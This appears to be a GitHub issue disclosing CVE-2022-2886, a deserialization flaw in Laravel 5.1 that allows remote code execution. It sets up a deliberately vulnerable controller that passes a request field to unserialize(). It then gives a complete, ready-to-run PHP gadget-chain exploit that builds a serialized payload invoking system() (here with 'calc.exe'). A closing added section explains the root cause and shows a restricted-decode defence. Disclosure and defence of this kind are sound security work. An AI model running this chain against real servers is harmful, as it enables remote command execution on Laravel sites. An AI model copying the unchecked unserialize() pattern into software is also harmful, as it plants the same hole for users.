CVE-2022-2886: Laravel5.1 POP4 RCE · Issue #3 · beicheng-maker/vulns

A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.


Laravel5.1 POP4 RCE

```
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
```

Add a controller, UsersController, in app/Http/Controllers/UsersController.php:

```php
<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;

class UsersController extends Controller
{
    /**
     * Create a new user.
     *
     * @param  Request  $request
     * @return Response
     */
    public function store(Request $request)
    {
        echo "Please post cmd to unserialize";

        $payload = $request->input("cmd");

        // Deliberately vulnerable: the request value reaches unserialize() unchecked.
        unserialize($payload);
    }
}
```

routes/web.php

```php
<?php

use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::post('/test', [\App\Http\Controllers\UsersController::class, 'store']);
```

exp

```php
<?php
namespace Faker;
class DefaultGenerator{
    public $default;
}

namespace Carbon;
class Carbon{}

namespace Faker;
class Generator{
    protected $formatters = [];
    public function __construct(){
        $this->formatters['huahua']='system';
    }
}

namespace Carbon;
use Carbon\Carbon;
use Faker\DefaultGenerator;
use Faker\Generator;
class CarbonPeriod{
    protected $current;
    protected $dateClass;
    protected $filters = [];
    protected $key;
    public function __construct(){
        $this->dateClass=new DefaultGenerator;
        $this->dateClass->default=new DefaultGenerator;
        $this->dateClass->default->default='huahua';
        $this->current=new Carbon;
        $this->filters[][]=[new Generator,'format'];
        $this->key=array("calc.exe");
    }
}

namespace Illuminate\View;
use Carbon\CarbonPeriod;
class InvokableComponentVariable{
    protected $callable=[];
    public function __construct(){
        $this->callable=[new CarbonPeriod,'valid'];
    }
}

namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
    private $arrays = [];
    public function __construct(){
        $this->arrays=new InvokableComponentVariable;
    }
}
echo urlencode(serialize(new Context));
?>
```
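The root cause is the `store()` action passing the `cmd` request field to `unserialize()`, which revives objects and lets their magic methods run. The following is an added example, not code from the issue or from Laravel: it contrasts that call with a restricted decode that accepts plain data only. `Probe`, `containsObject()` and `decodeUntrusted()` are hypothetical names, and both payloads are constructed, harmless samples.

```php
<?php
// Added example. Probe, containsObject() and decodeUntrusted() are hypothetical
// names; both payloads are constructed, harmless samples. Requires PHP 7.0+.
class Probe
{
    public static $fired = [];
    public $label = 'probe';

    // Stand-in for a gadget class: once unserialize() revives the object, PHP
    // calls this magic method with property values taken from the payload.
    public function __destruct()
    {
        self::$fired[] = $this->label;
    }
}

// True if the decoded value holds an object anywhere, at any nesting depth.
function containsObject($value): bool
{
    if (is_array($value)) {
        return (bool) array_filter($value, 'containsObject');
    }
    return is_object($value) || $value instanceof __PHP_Incomplete_Class;
}

// Plain data only: allowed_classes => false instantiates no application class,
// and a payload that carried any object is rejected instead of being used.
function decodeUntrusted(string $payload): array
{
    $data = @unserialize($payload, ['allowed_classes' => false]);
    if (!is_array($data) || containsObject($data)) {
        throw new InvalidArgumentException('payload rejected');
    }
    return $data;
}

$plain  = 'a:1:{s:3:"cmd";s:6:"status";}';                             // constructed
$object = 'a:1:{s:3:"cmd";O:5:"Probe":1:{s:5:"label";s:5:"probe";}}'; // constructed

unserialize($object);              // same call as store(): Probe is revived, then destroyed
var_dump(Probe::$fired);           // labels recorded by __destruct during the unsafe call
Probe::$fired = [];
var_dump(decodeUntrusted($plain)); // a plain array passes through unchanged
try {
    decodeUntrusted($object);      // the object payload is refused
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
var_dump(Probe::$fired);           // labels recorded during the restricted decode
```

Where the request only needs to carry plain data, `json_decode()` avoids the object-revival path altogether.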
